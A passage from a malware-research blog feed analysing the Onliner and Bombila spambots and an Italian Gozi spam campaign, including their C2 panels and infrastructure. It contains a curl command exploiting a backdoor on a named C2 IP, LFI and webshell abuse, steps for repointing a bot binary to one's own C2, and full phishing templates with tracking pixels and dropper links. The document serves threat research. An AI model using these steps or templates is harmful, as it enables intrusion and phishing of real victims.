today I'll present some research around a spambot named "Onliner". This spambot is actually used for <a href="https://benkowlab.blogspot.fr/2017/01/a-journey-inside-ursnif-campaign.html"> spreading Gozi</a>.</br>
I've already talk about Onliner in another blogpost but because the spambot quickly evolve, and the botmaster seems to <b>tries</b> to avoid pwning attempst, I'll try to explain everything here :].</br></br>
<h2>Original sample</h2>
The <a href="http://vxvault.net/ViriFiche.php?ID=32824">first sample</a> that I've grab come from email, dropped by JSDropper. </br>
A quick dynamic analysis allow us to understand that it's a spambot (a lot of SMTP connections from the malicious process). </br>Before reversing it, let's look a the CNC communication.</br>
<a href="https://i.imgur.com/KmZMRNU.png"><img src="https://i.imgur.com/KmZMRNU.png" height=210px></a></br>
Malware communicates over HTTP. An interesting thing is that the process doesn't contacts directly the CNC, it try to contact some proxy web page (PHP script uploaded on compromised websites).</br>
</br>
<h2>Proxy - Good idea - Bad realization</h2>
Using proxy websites is a good idea only if you don't use poor pwned CMS. With poor pwned CMS it take around 3 minutes to anybody to retrieves your real CNC. Example:</br>
I can make some supposition:</br>
<ul>
<li>It's pretty sure that the bot master uses a script for updating all the proxies scripts</li>
<li>All the compromised websites are old: most probable infection vectors are FTP Bruteforce or CMS exploits</li>
<li>They have leave a php backdoor somewhere on the compromised website</li>
</ul>
I have try to found the PHP backdoor for using it to read the PHP proxy code. After some guessing I have saw that the PHP backdoor is a WSO webshell, uploaded always in the same locations:
<ul>
<li>/cgi-bin/terms.php</li>
<li>/cgi-bin/useterms.php</li>
<li>/css/terms.php</li>
<li>/css/useterms.php</li>
</ul>
the WSO webshell is protected by a poor password -> I can read the PHP proxy code :).
The commented version below:</br>
<script src="//pastebin.com/embed_js/jDuu34L9/noheader"></script>
</br>
The real CNC is http://194.247.13.8/img/. I'll come back later on the $GET_['99'] / $_POST['99'] parameters, those parameters are really interesting in the pwning process :D.
</br>
<h2>Panel - Good idea - Bad realization</h2>
<center><a href="https://i.imgur.com/ECTz4HW.png"><img src="https://i.imgur.com/ECTz4HW.png" height=410px></a></center></br>
Funny, the authentication is not like in others panels.</br>
I don't want to directly use brute force here because like in almost all panels it must have a vulnerability somewhere.<br>
Come back to the malware communication. As you can see here, the malware download some dll (ssl and 7zip) from the CNC.</br>
<script src="//pastebin.com/embed_js/974s4Hfi/noheader"></script></br>
I'm not a good pentester but when you saw a full dll name ssleay32.dll in a GET parameter, it's smell something bad \o/.</br>
<center><a href="https://i.imgur.com/ulmBF4e.png"><img src="https://i.imgur.com/ulmBF4e.png" height=270px></a></center></br>
<center><iframe src="//giphy.com/embed/18QdBb5NApXB6" width="480" height="270" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center></br>
Thanks to that LFI we have access to all the panel (click on image bellow for the full album)</br>
<center><a href="https://imgur.com/a/cytZv"><img src="https://i.imgur.com/HKj9Ave.png" height=410px></a></center></br>
After looking around, I've found a reference to another IP: 194.247.13.178. This server host another onliner web panel: hxxp://194.247.13.178/naomi/login.php (click on image bellow for the full album)</br></br>
<center><a href="https://imgur.com/a/B7Mug"><img src="https://i.imgur.com/Muhwg6v.png" height=490px></a></center></br>
</br>
By looking at the IP addresses (194.247.13.18 and 194.247.13.178) it seems that those guys really like "DELTA-X" hoster (Ukraine). </br>
You know, for science, I've try to scan 194.247.13.0-255 with Nmap on port 80 + some directory guessing with Patator.</br>
And you know what? It works haha! </br>
<center><iframe src="//giphy.com/embed/fbBNEQbLQdXKU" width="480" height="358" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center></br>
I've found another panel at hxxp://194.247.13.196/asus/login.php . </br>
</br>
<h2>Panel V2 - Good idea - Bad realization</h2>
After releasing the first blogpost about onliner, the botmaster change some stuff. They start to use IP White listing for accessing the panel, they update some code, they don't patch the LFI, they add some others vulns x].</br></br>
Now, due to IP White listing, when you try to access the web panel, you are kicked by the PHP script:</br>
<center><a href="https://i.imgur.com/zbSlewh.png "><img src="https://i.imgur.com/zbSlewh.png" height=290px></a></center></br>
The LFI is still here so we can look at the code. We can see 4 IPs white listed (Please don't spoil yourself, ignore the 2 first foreach haha I'll discuss that below):</br>
<script src="//pastebin.com/embed_js/hpUBmNjG/noheader"></script>
</br>
It looks bad. I can read the PHP code but I can't access the admin panel. It's time to understand the authentication process. Take a seat, it's wonderfull. This is a big picture of the process:</br>
<center><a href="https://i.imgur.com/z6U6igO.png "><img src="https://i.imgur.com/z6U6igO.png" height=590px></a></center></br>
admin.php:</br>
<script src="//pastebin.com/embed_js/vucDx1aT/noheader"></script>
</br>
I cannot explain yet what the hell is that </br>
if ($_GET['pass']=='Lm7%Dv)ko4q') {</br>
include('login.php');</br>
}</br>
Anyway, the big picture show us that the situation looks bad, the IP White listing is done early. But the function for IP White listing is in fact... a backdoor \o/:</br>
<script src="//pastebin.com/embed_js/hNgUvhau/noheader"></script></br>
Remember the $_GET['99'] in the PHP proxy script ? Look at the script. For bypassing IP White listing when an infected bot try to contacts the CNC, they use this parameters $_GET['99'] and $_POST['99']. </br>I just need the code (in config.php) + set the POST and GET variables and I can access to the CNC from any IPs.</br></br>
curl --data "code=70183619&99=backdoor" "http://194.247.13.178/naomi/admin.php?99=backdoor&mailer=true" > onliner.html
</br></br>
<center><a href="https://i.imgur.com/s7lw9bm.png"><img src="https://i.imgur.com/s7lw9bm.png" height=490px></a></center></br>
</br>
<h2>Bonus</h2>
To finish, I just want to show you without comment 2 security features used in the Onliner panel.</br>
Anti-SQLi:</br>
<script src="//pastebin.com/embed_js/F8gYxDvu/noheader"></script>
</br>
Anti-... I don't know what:</br>
<script src="//pastebin.com/embed_js/NHJ75gLF/noheader"></script>
</br></br>
<h2> Malware binary</h2>
The malware himself is in fact a dropper. When you run it, it copy itself in C:\windows\ and re-run as services.</br>
</br>
The dropper try to drop 2 dlls:
<ul>
<li>http://cnc.com/MailerSMTP/dll.dll : the Spam module</li>
<li>http://cnc.com/CheckerSMTP/dll.dll : the SMTP credentials checker module</li>
</ul>
Those 2 dll are xored with the key </br>[0x37, 0x32, 0x44, 0x45, 0x34, 0x45, 0x35, 0x33, 0x36, 0x46, 0x35, 0x42, 0x32, 0x37, 0x39, 0x36, 0x31, 0x43, 0x43, 0x44, 0x41, 0x37, 0x30, 0x43, 0x32, 0x30, 0x39, 0x37, 0x38, 0x32, 0x46, 0x44, 0x44, 0x35, 0x31, 0x34, 0x43, 0x34, 0x36, 0x37, 0x44, 0x37, 0x39, 0x44, 0x30, 0x39, 0x39, 0x33, 0x38, 0x30, 0x33, 0x35, 0x31, 0x39, 0x43, 0x33, 0x32, 0x41, 0x46, 0x37, 0x33, 0x30, 0x34, 0x30, 0x00]
</br>
</br>
A little schema of the malware communication initialization: (the communication is encoded with base64 with $_GET parameters)</br>
<center><a href="https://i.imgur.com/KNNlv4C.png"><img src="https://i.imgur.com/KNNlv4C.png" height=560px></a></center></br>
All the modules needed are copied in c:\windows\ too.</br> After installation, the malware wait for command from the CNC.
Here, an example with the CheckerSMTP Module:</br>
<ul>
<li>The CNC send the "control account", this account (mail+password+smtpserver) is used to be sure that the spamming process works. Valid SMTP credentials can be sends to this control account to</li>
<li>The CNC send a file a list of SMTP server + a list of compromised account in 2 zip files. mask.zip and 3746000.zip</li>
<li>The CNC wait until the bot finish his job and send another list of SMTP+Credentials</li>
</ul>
</br>
The sample is pretty good detected by AV industry (maybe due to the lot of debug strings present in the binary).
</br></br>
<h2>Conclusion</h2>
As reminded, this spam bot is used to spread Gozi in Italy and Canada. </br>
Onliner has around 1000 infected bots, they don't spread to much sample of the spambot.</br></br>
I look forward the next update of the panel.
</br>
<center><iframe src="//giphy.com/embed/xTiTnwHqDpBxHJ1yOQ" width="480" height="270" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center>
</br>
<h2>Annexe</h2>
Onliner known IPs:
<ul>
<li>194.247.13.8</li>
<li>194.247.13.178</li>
<li>194.247.13.196</li>
<li>91.210.165.163</li>
</ul>
</br>
Spambot sample:
<ul>
<li><a href="https://www.virustotal.com/fr/file/9144917a27453e8d69596a41ea003a5bf7d33334caaa4e67f5f8f9ef9cc3bcd1/analysis/">9144917a27453e8d69596a41ea003a5bf7d33334caaa4e67f5f8f9ef9cc3bcd1</a></li>
<li><a href="http://vxvault.net/ViriFiche.php?ID=32824">B5C87CAB2FF99D1E4B4C3EE897B07869FA8F6A63FBD27018F589C105FAF91FCD</a></li>
</ul>
</br>
Module samples:
<ul>
<li><a href="https://www.virustotal.com/fr/file/3f28a345393273cab4c6cea060644646bf9d0e5b2ebd7dd0c3935fe696223565/analysis/">3f28a345393273cab4c6cea060644646bf9d0e5b2ebd7dd0c3935fe696223565</a></li>
<li><a href="https://www.virustotal.com/fr/file/b535d1eec26275fb53561a7dd3c6454b8036176f8fbdd12a64f2ed4defccb618/analysis/" >b535d1eec26275fb53561a7dd3c6454b8036176f8fbdd12a64f2ed4defccb618</a></li>
</ul>Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-80709186595828723402017-01-30T10:13:00.000-08:002017-02-05T10:31:30.227-08:00БОМБИЛА - БОТНЕТ <H1>Spambot safari #1 - Bombila</H1>
Hey! </br>
</br>
Let's go for a Spambot safari. </br>
There is a lot of malware analysis on the Internet but a very small number about malware used for Spamming (Necurs is a rare exception). But behind every big spam campaign, there is a spambot. And this part of the campaign is often technically weak.</br></br>
It's easy to find a spambot. Most of the time, botmatsers's do the error of spreading the spambot's binary via the spam botnet itself. Due to the malware's communication, this mistake expose the spambot architecture and allow us to analyze the CNC part.</br>
Looking for malware with SMTP communication on public sandboxes is a another good way to find spambot samples.</br>
</br>
Here, I'll try to describe "Bombila" Spambot (БОМБИЛА). </br>
This malware was used for spreading Teslacrypt in 2016 (if you want to understand how weak are spamming campaigns, take a look at: <a href="https://thisissecurity.net/2016/03/02/lets-ride-with-teslacrypt/">https://thisissecurity.net/2016/03/02/lets-ride-with-teslacrypt/</a>)</br></br>
I'll try to give an overview of this malware.</br>
Sample: <a href="http://vxvault.net/ViriList.php?MD5=5647F30013E4BDECF134157BD3C6F7B0">6aa5fd384fbfe271a5000397e2e0c9d9e06dd5d041488e4f2de7ae3a4eb1589d</a></br></br>
<H2>Silent_SMTP_Bruter.exe</H2>
The malware itself (Silent_SMTP_Bruter) is not really interresting and seems in developpment; </br>
A lot of bugs, poor strings obfuscation, OutputDebugStrings, a log file created in C:\log.txt...</br>
Persistance is done via CurrentVersionRun, there is no self replication or hidden feature (the malware stay where you launch it), after some connection checks, the malware contact the CNC (HTTP). If you kill the process with the task manager, the malware stop working.
</br></br>
<img src="https://i.imgur.com/Luvdo1v.png" height=54px ></br>
<center>Wow! So much obfuscation...</br></center></br>
<img src="https://i.imgur.com/5FbUHTC.png" height=454px ></br>
<center>"Silent_SMTP_Bruter" string is present in the PACKAGEINFO</center></br></br>
As usual the malware is composed of a SMTP bruteforce module and a SMTP spam module.</br>
The main module try to contacts a gate "cmd.php" in 2 different ways:
<ul>
<li>A POST request $_POST['status'] every 5 minutes for sending bot status</li>
<li>a GET request whitout parameter for retrieving new order.
</ul>
</br>
<H2>Not so boring malware</H2>
But, the best part is not in the malware itself; it's the icon of the malware \o/. You can observe a funny behaviour; when you rename the binary, the binary's icon changes. It take icons already present in system icon cache. The hash is still the same (works on Windows 10 up to date :]). </br>
It can be used to fool victims because the malware takes icon like directory or Word, txt etc </br>
<img src="https://i.imgur.com/S0vF11n.png" height=140px ></br>
</br>
If we extract the icon from resources binary, I reproduce the bug with the .ico icon:</br>
<center><img src="https://i.imgur.com/h3Xnuu7.png" height=160px ></center></br></br>
It's a very small icon file (78bytes)</br></br>
<img src="https://i.imgur.com/SV76AL9.png" height=200px ></br>
In red, it's the Ico header composed of 2 structures: <a href="https://msdn.microsoft.com/en-us/library/ms997538.aspx">ICONDIR and ICONDIRENTRY</a></br>
In green, it's the bitmap header, in the structure <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/dd183376(v=vs.85).aspx">BITMAPINFOHEADER</a></br>
In blue it's the color data RGB</br>
</br>
It seems that, after a MapViewOfFile, user32 misparse bitmap data and choose a "random" icon in the icon Cache (C:\Users\login\AppData\Local\Microsoft\Windows\Explorer).</br>
I'm still working on that; I'll try to write a post about how reverse these kinds of UI tricks without getting suicidal tendencies \o/.</br>
Thanks a lot to <a href="https://twitter.com/antelox">@Antelox</a> for his precious help :]
</br></br>
<H2>Crack the bot</H2>
During Teslacrypt analysis I was abble to dump the web panel. So, why not try to patch the bot with my CNC for playing with all the features ?
</br>
For that, we have to understand were is stored the CNC in the binary and patch it.</br>
There is a good resource about that on <a href="http://www.xylibox.com/2013/01/how-to-hex-malware-and-make-builder.html">Xylibox</a>
But in this case I'll use a easier way :]. In the binary we can see that the CNC is "obfuscated" (loc_4480D3)
</br>
<script src="https://pastebin.com/embed_js/i5tyt8Qd/noheader"></script>
</br>
<script src="https:///pastebin.com/embed_js/FvfGWY0z/noheader"></script>
</br>
It's now easy to make a dirty python script for encoding our CNC and patch the binary (Offset 0x58488)
</br>
Due to a stupid parsing error, the CNC must look like "http://domain.com/folder" without the last slash.
</br>
<center><img src="https://i.imgur.com/eGE0yNI.png" height=480px ></center></br>
<center><img src="https://i.imgur.com/cDMVnpb.png" height=160px ></center></br>
<img src="https://i.imgur.com/Kk8od2g.png" height=420px ></br>
You can now control the bot and explore all the features \o/.
</br></br></br>
<H2>Panel Overview</H2>
<center><img src="https://i.imgur.com/4LoCMmT.png" height=230px ></center></br>
<center><img src="https://i.imgur.com/sooqbHo.png" height=420px ></center></br>
The source code is a real mess. It looks like the panel is a compilation of 2 panels</br>
For example there is 3 footers in index.php:</br>
<script src="https://pastebin.com/embed_js/wtQAnn01/noheader"></script>
</br>
Some comments refer to other projects:</br>
<center><img src="https://i.imgur.com/CLQ2OF0.png" height=420px ></center></br>
</br>
It's time for a quick overview (I've try to do a quick and dirty english version (thanks <a href="http://twitter.com/KodaES">@KodaES</a> :D), put your cursor on the image for the translated version):</br>
The home page:</br>
<a href="https://i.imgur.com/F2lOzTD.png"><img src="https://i.imgur.com/F2lOzTD.png" onmouseover="this.src='https://i.imgur.com/XeYll3U.png'" onmouseout="this.src='https://i.imgur.com/F2lOzTD.png'" height=300px /></a></br>
From this page, you can:
<ul>
<li>Upload emails lists</li>
<li>Upload subject, messages, "from", header etc</li>
<li>retrives statistics about the spam campaign</li>
<li>retrives some statistics about infected bots</li>
<li>configure the campaing</li>
</ul>
<a href="https://i.imgur.com/L0azcnl.png"><img src="https://i.imgur.com/L0azcnl.png" onmouseover="this.src='https://i.imgur.com/HG83qmC.png'" onmouseout="this.src='https://i.imgur.com/L0azcnl.png'" height=380px /></a></br>
</br>
I cannot found any bot lists or campaigns details directly form the webpanel.</br>
Some page are only accessible by reading the source code.</br>
In fact, index.php is a big switch case: </br>
</br>
<script src="https://pastebin.com/embed_js/sX8F4yAt/noheader"></script>
</br>
</br>
For example: the bots list (index.php?act=work): </br>
<a href="https://i.imgur.com/O01uiwa.png"><img src="https://i.imgur.com/O01uiwa.png" onmouseover="this.src='https://i.imgur.com/DPYo72N.png'" onmouseout="this.src='https://i.imgur.com/O01uiwa.png'" height=190px /></a></br>
</br>
Search engine:</br>
<a href="https://i.imgur.com/P4wSSgQ.png"><img src="https://i.imgur.com/P4wSSgQ.png" onmouseover="this.src='https://i.imgur.com/3p1iJZD.png'" onmouseout="this.src='https://i.imgur.com/P4wSSgQ.png'" height=155px /></a></br>
there is no dropping or backdoor feature. This malware is only about spam purpose.
</br></br>
<H2>After Teslacrypt ?</H2>
</br>
I've try to found other sample of this malware after the end of Teslacrypt. </br>
I've found a <a href="http://cybercrime-tracker.net/index.php?search=spnsmtpchtr.com%2Findex_old.php">another panel </a> but nothing else. </br>
<img src="https://i.imgur.com/J4ymU3d.jpg" height=280px ></br>
</br>
I think it can be easy to retrives new sample via VTi.
</br>
</br>
Some numbers to conclude (based on webstat files found on the CNC):
</br>
From December 2015 to February 2016, Bombila :
<ul>
<li>was composed of ~10 000 bots</li>
<li>has sent at least 10 millions emails </li>
</ul>
</br>
</br>
Thanks for reading :]
</br>
<img src="https://68.media.tumblr.com/ad74a2134bc497766167d41effb76b83/tumblr_o0kw7uXPjy1rflj6co2_r1_500.gif" height=280px ></br>
Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comtag:blogger.com,1999:blog-330713861169915021.post-30615066922226632522017-01-20T09:57:00.003-08:002018-12-04T09:35:42.051-08:00A journey inside Gozi campaign<H1>A journey inside Gozi campaign</H1>
</br>
Goziis a <a href="http://www.seculert.com/blogs/ursnif-deep-technical-dive">well known</a> bankin trojan. In this blogpost, I'll try to take a look deeper at a recent campaign for understanding how that works.
<blockquote class="twitter-tweet" data-lang="fr"><p lang="en" dir="ltr"><a href="https://twitter.com/dhlexpressuk">@dhlexpressuk</a> <a href="https://twitter.com/hashtag/phishing?src=hash">#phishing</a><br>Subj:DHL Italy - documenti importanti<br>File:HK5863.js<br>MD5:f356cb644971384240e05a5d22cd149f<br>VT:4/50<a href="https://twitter.com/malwrhunterteam">@malwrhunterteam</a> <a href="https://t.co/hNWULLHwq0">pic.twitter.com/hNWULLHwq0</a></p>— guga (@illegalFawn) <a href="https://twitter.com/illegalFawn/status/795643761325932546">7 novembre 2016</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>
</br>
Let's try to understand all the chain of infection from spambot to Gozi dropper.
</br>
<h2>The spambot - Onliner</h2>
<center><a href="https://i.imgur.com/WUpikxU.png"><img src="https://i.imgur.com/WUpikxU.png" width="600px"></a></center>
This Gozi campaign is based on a SpamBot called <a href="http://cybercrime-tracker.net/index.php?search=onliner">"Onliner"</a>. As we can see in the C&C Panel, this spambot has 2 main features:
<ul>
<li>
Checker: You provide a list of compromised smtp accounts to the spambot and some bots test if credentials are valids.</br>
<a href="https://i.imgur.com/9Xi9eDj.png"><img src=https://i.imgur.com/9Xi9eDj.png height="90%" width="90%"></a>
</li>
</ul>
I've found around 80 millions compromised SMTP accounts on the checker module. Some of them come from public leaks (like badoo, linkedin...) and some other come from unknown sources.</br>
<ul>
<li>
Mailer: The spam mailer:
<a href="https://i.imgur.com/GsO9tGA.png"><img src=https://i.imgur.com/GsO9tGA.png height="500px"> </a>
</br>
<a href="https://i.imgur.com/Ktesp2T.png"><img src=https://i.imgur.com/Ktesp2T.png height="500px"> </a>
</br>
Mailer requests details:
<textarea rows="20" cols="80">
//Статусы ошибок ОТВЕТА СЕРВЕРА
//-1 Бот заблокирован по IP
//-2 Нет активной рассылки
//-3 Данного бота нет! в списке активных (должно срабатывать толлько при чей-либо попытке подделать запрос).
//-4 Нет аккаунтов
//-5 Не удалось загрузить ssl библиотеку
//-6 Бот прислал статус ошибки (Какую либо)
//-7 Прошлый статус у бота не Done, новую рассылку получить нельзя
//-8 Бот заблокирован по количеству онлайн работающих ботов
//-9 Бот заблокирован по стране
//-10 В таблице нет индексов. (Такого быть не должно! Нулевой индекс есть всегда(смещение от старта))
//-11 Нет больше блоков
//Статусы ошибок ЗАПРОСА БОТА
//-1 Блокировка по таймауту 6 минут (не удалось отправить ни одного письма за 6 минут)
//-2 Ошибка загрузки базы получателя
//-3 Нет папки для загрузки zip архива с заданием
//-4 Не удалось загрузить списо аккаунтов
//-6 Блокировка по таймауту
Google translate:
// Server errors status
// - 1 Bot blocked by IP
// - 2 No active mailing
// - 3 This bot is not in the active list (someone else's attempt to forge a request).
// - 4 No accounts
// - 5 Could not load ssl library
// - 6 Bot sent error status (or What)
// - 7 Last status bot not Done, a new e-mail can not be obtained
// - 8 Bot locked by the number of working bots online
// - 9 Bot locked by country
// - 10 The table does not have indexes. (This should not be! Zero index is always (the offset from the start))
// - 11 No more blocks
// Bot requests errors status
// - 1 lock timeout 6 minutes (could not send a single emails in 6 minutes)
// - 2 base recipient Error loading
// - 3 No folder to download the zip file with the job
// - 4 Unable to load record to the population accounts
// - 6 Lock timeout
</textarea>
</li>
</ul>
If we look at the changelog, this spambot seems to be quite young:
</br>
<a href="https://i.imgur.com/NnNoJti.png"><img src=https://i.imgur.com/NnNoJti.png height="470px" > </a>
</br>
As we can see in the PHP source code, it seems that a SMTPBruteForcer exists: </br>
<a href=https://i.imgur.com/E9GsFLC.png"><img src=https://i.imgur.com/E9GsFLC.png height="90%" width="90%"></a>
</br></br>
<h2>Gozi spam</h2>
<h3>Fingerprinting campaign</h3>
Let's focus on Gozi campaign. This campaign is quite interesting. First of all, botmaster(s) starts by a fingerprinting round. </br>
They send some random emails with a hidden image inside:
</br>
<textarea rows="20" cols="80">
<IMG width=1 height=1 src="http://conceptcreationnv.com/2015/cgi-bin/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}" alt="mobile">
Hello, Champ {friend|champion\enthusiast}! How {are you|is your day}?
{My name is|I'm} Natalia. Do you believe in {fate|destiny}?
Love is inseparable fellow of hope. {Sorry for|Pardon} my English, but I hope you'll {understand|get} that I let my {passion|flame} speak for me.
I wish you realize that it's not just some words - it's a faith that lies within my soul.
I hope you won't leave it at just {cursory reading|skimming} of the letter, and will {see|recognize} my true feelings behind it.
It like I'm sending you {piece|part} of my soul. It's really important to me!
Because I'm looking for a serious man who's ready to build {meaningful|committed} {relationship|partnership}.
I wanna go {on|through} a journey from a beautiful bride to a caring mother.
I dream to meet {an honest|a sincere} man, who will take me to {mysterious|secret} {places|lands} and show me a whole new world.
Don't give me your sympathy, give your feelings instead!
I hope to see {through|in} your {response|answer} that your interest in me has a depth. Eagerly awaiting for your {letter|message} and {photos|pictures}!
Bye-bye!
</textarea>
</br>
When a victim open this email, some information are leaked to "http://conceptcreationnv.com/2015/cgi-bin/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}". These information (User Agent, IP etc) are usefull for the botmaster because he can indentify specifics groups of users (Windows users for example).
</br>
The script used for victims classification:</br>
<script src="//pastebin.com/embed_js/ZLagdg3E/noheader"></script>
</br>
Output for Windows users:</br>
<script src="//pastebin.com/embed_js/MDSbQtBj/noheader"></script>
</br>
This spam campaign is maybe used for tests purpose or for target identification.
</br></br>
<h3>Gozi campaign</h3>
After the fingerprinting campaign, the spambot is used for spreading a dropper which leads to Gozi .</br>
This JScript dropper is spread via fake invoices;
</br>Some example of spams templates used during the campaign:
</br>
DHL invoce:
<textarea rows="20" cols="80"><IMG width=1 height=1 src="http://conceptcreationnv.com/2015/cgi-bin/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}" alt="DHL"><br>
<img class="logo" alt="Track DHL Express Shipments" src="http://www.dhl.com/img/meta/dhl_logo.gif" height="48" width="171"><br><br>
Gentile cliente {email2} <br><br>
Notifica, numero di consegna 1{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}<br>
<h2><center><a href="https://docs.google.com/uc?id=0B-a13vsWk4EYRHY1Q2xGZTQ2N0U">
documento stampa</a><center></h2><br>
<sup style="color: #ffffff;">#FILE2</sup><br><br>
Numero d'ordine: {1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}0{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}0{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}<br>
----------------------------------------------------------<br><br>
DHL Supply Chain (Italy) S.p.A.<br>
Sede Legale: Settala, (MI) viale delle industrie 2.<br>
Capitale sociale: Euro 1.548.000,00 diviso in n. 300.000 azioni da Euro 5,16 cad.- versato Euro 1.548.000,00<br><br>
Soci: DHL Holding (Italy) S.r.l. (100%)<br>
Codice Fiscale/Registro Imprese: 00718630155<br>
R.E.A.: MI-618656<br>
Data di costituzione: 18/12/1962<br>
<small style="color: #ffffff;">#FILE1</small><br>
</textarea>
</br></br>
Insurance invoce:
<textarea rows="20" cols="80">
<IMG width=1 height=1 src="http://conceptcreationnv.com/2015/cgi-bin/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}" alt="ILOMA"><br>
<img class="logo" alt="ILOMA SRL" src="http://evi-verein.at/templates/css/logoIloma.png" height="48" width="171"><br><br>
Gentile Cliente {email2}<br><br>
Con la presente Vi chiediamo informazioni circa il pagamento 1{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9} euro relativo alle nostre fatture indicate in oggetto.<br><br>
<h2><center><a href="http://www.diamondfitness.hu/css/294DHL.php">
INFORMAZIONI DETTAGLIATE</a><center></h2><br>
Vi ricordiamo che alla sistemazione delle nostre competenze seguira il rimborso della liquidazione da parte della Compagnia Assicuratrice.<br><br>
Cordiali saluti<br>
-------------------------------------------------------<br>
support@iloma.it<br>
cell. +39 328 4975254<br><br>
visita il sito www.iloma.it<br><br>
ILOMA srl<br>
sede legale: Via Coni Zugna, 71 20144 Milano<br>
sede operativa: Via Garibaldi, 38 44121 Ferrara<br>
telefono 0532.240112 - fax 0532.215377<br>
P.IVA e C.F. 08522860967<br>
-------------------------------------------------------<br>
Ricordiamo che ai sensi della legge sulla privacy, nessuno puo leggere e/o visualizzare
il presente messaggio, tranne il destinatario; comunque in caso di erronea ricezione,
Vi preghiamo di provvedere alla distruzione dello stesso, compreso eventuali allegati
</textarea>
</br></br>
Spam targeting Hotel:</br>
<textarea rows="20" cols="80">
Hello {email2}.<br><br>
There were difficulties with the registration of rooms at the hotel!<br>
Some of the documents were written in error.<br><br>
Please check our documents, all right now?<br><br>
Thank you!<br>
</textarea>
</br>
Fake invoice
<textarea rows="20" cols="80">
<IMG width=1 height=1 src="http://{wedarenda.ru|wecanall.ru|webslike.ru|webroyal-demo.ru|webowltest.ru|wayorganic.ru|wattpoint.ru|watchbaza.ru|wapseduction.ru|walltowall.ru|yogurt-land.su|yogurtland.su|vvaz.ru|vtormetgrup.ru|vstr.su|vsrp-samp.ru|vsevservis.ru|vsevenglishhome.ru|vse-kedz.ru|vsekedz.ru|vse-keds.ru|vsekeds.ru|vse-kedi.ru|vsekedi.ru|vsegdaskidki.ru|vseagro.ru|vrline.ru|vrbox63.ru|vprtfl.ru|vozdushnii-syurpriz.ru|vottakda.ru|vota.ru|voshodnews.ru|vorota-doorhan39.ru|volttek.ru|voltea.ru|volinrok.ru|vojnageroev.ru|vodver.ru|vodrus.ru|vodoemclub.ru|vodo-econom.ru|voder24.ru|vodacrimea.ru|vnovdesign.ru|vl-tur.ru|vlovke.ru|vlevkin.ru|vlcustom.ru|vlad-pvh.ru|vkysnayeda.ru|vkverifed.ru|vk-verif.ru|vkusnyj-zavtrak.ru|vkusnyj-uzhin.ru|vkusnye-obedy.ru|vkuseka.ru|vkremain.ru|vkrecovri.ru|vkrecovery.ru}/m/a/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}" alt="Marconigomma"><br>
Buon giorno {email2}<br><br>
In allegato vs. offerta controfirmata, prego prendere nota della correzione alla rag. Sociale della societa'.<br>
NB: servono entrambi gli isolanti, piu' la resistenza.<br>
Il corriere e GLS , prego avvisare quando materiale pronto per organizzare il ritiro.<br>
Le fatture vanno indirizzate come di seguito riportato:<br><br>
<h2><center><a href="http://icrem.it/css/SRL_6849.php">
documento stampa</a><center></h2><br>
Ufficio Amministrazione<br>
Marconigomma SPA con socio unico<br>
Via dell'Europa 28 - 40037 Sasso Marconi (BO) tel. +39 051 841316 fax +39 051 6750157 - 6752016<br><br>
Cordialmente<br>
RGS-Coordinamento Manutenzione<br><br>
Tel. 051 841316 - Fax 051 6750157<br>
-----------------------<br>
Marconigomma Group SPA<br>
Via dell Europa, 28 - 40037 Sasso Marconi BO - C.F./P.IVA/Reg. Imp. 02123801207 - Capitale Sociale 200.430,00 i.v. - REA BO-415402
</textarea>
<a href="https://i.imgur.com/Ncvg0tT.png"><img src=https://i.imgur.com/Ncvg0tT.png height="95%" width="95%"> </a>
</br>
The first stage is <a href="https://pastebin.com/sEJr2dSY">a dropper in JScript - fattura_93785849.js</a>:</br>
<script src="//pastebin.com/embed_js/XqTE3m3q/noheader"></script>
</br>
The JScript tries to contact www.xxxxxx.xxx/r4.php. <a href="https://pastebin.com/fxLvrM06"> r4.php</a> return another <a href="https://pastebin.com/CYHJ6kpf/noheader">JScript code</a>. This is the main component:</br>
<script src="//pastebin.com/embed_js/CYHJ6kpf/noheader"></script>
</br>
eval(r4.php?cmd=d) returns another JScript used for "Drop and Launch" Gozi . This script can be in 7 differents form:</br>
<ul>
<li><a href="https://pastebin.com/3DfB0JCT">bitsadmin_dll</a> </li>
<li><a href="https://pastebin.com/4uX9VV09">bitsadmin_exe</a> </li>
<li><a href="https://pastebin.com/ZDqHnfd7">js_dll</a> </li>
<li><a href="https://pastebin.com/dJMnSqbD">js_exe</a> </li>
<li><a href="https://pastebin.com/HP1xR1bn">js_exe_notepad</a> </li>
